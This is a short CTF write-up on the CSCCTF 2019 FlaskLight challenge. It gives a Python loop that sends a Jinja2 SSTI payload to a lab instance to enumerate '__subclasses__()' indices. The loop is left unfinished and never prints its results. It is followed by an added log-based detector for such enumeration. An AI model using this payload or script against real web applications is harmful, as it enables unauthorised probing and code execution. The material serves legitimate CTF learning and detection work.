[CSCCTF 2019 Qual]FlaskLight
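The page takes a GET request parameter; given the challenge name, try SSTI.
This confirms that SSTI is indeed present.
Reading files works, but app.py cannot be read and command execution is blocked as well, so let's see how the experts bypass it.
First, write a script to enumerate the usable classes.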
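import requests
import re
import html
import time

index = 0
# Request each subclass index in turn and pull the rendered class out of the response.
for i in range(170, 1000):
    try:
        url = ("http://aa86b4ee-a0a7-4634-8ef2-f4e80e7613ce.node3.buuoj.cn/?search="
               "{{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}")
        r = requests.get(url)
        res = re.findall(r"<h2>You searched for:</h2>\W+<h3>(.*)</h3>", r.text)
        time.sleep(0.1)  # throttle requests to the challenge instance
    except requests.RequestException:
        continue  # skip an index whose request fails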
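Seen from the server side, the loop above leaves a distinctive trail: one client requesting many different `__subclasses__()[N]` indices in a row. The following detector is an added example, not part of the original writeup; the combined access-log format, the sample lines, the function name `find_subclass_enumeration` and the threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Client address and request target of a combined-format access log entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# An index into __subclasses__(), as used by the enumeration payload above.
SUBCLASS_INDEX = re.compile(r"__subclasses__\s*\(\s*\)\s*\[\s*(\d+)\s*\]")


def find_subclass_enumeration(lines, min_indices=5):
    """Return {client: sorted indices} for clients that requested at least
    min_indices distinct __subclasses__() indices (hypothetical threshold)."""
    seen = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # Decode twice so a double-encoded payload (%255B -> %5B -> [) still matches.
        decoded = unquote_plus(unquote_plus(target))
        for idx in SUBCLASS_INDEX.findall(decoded):
            seen[client].add(int(idx))
    return {c: sorted(i) for c, i in seen.items() if len(i) >= min_indices}


# Constructed sample log: addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jan/2024:10:00:{n % 60:02d} +0000] '
    f'"GET /?search=%7B%7B%27%27.__class__.__mro__[2].__subclasses__()[{n}]%7D%7D HTTP/1.1" 200 512'
    for n in range(170, 180)
] + [
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /?search=flask HTTP/1.1" 200 300',
    '198.51.100.9 - - [01/Jan/2024:10:00:07 +0000] '
    '"GET /?search=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__()%5B40%5D%7D%7D HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for client, indices in find_subclass_enumeration(SAMPLE_LOG).items():
        print(f"{client}: {len(indices)} indices, {indices[0]}..{indices[-1]}")
```

Lowering `min_indices` to 1 turns the same function into a plain "any `__subclasses__()` index in a query string" alert, which is noisier but catches single manual probes.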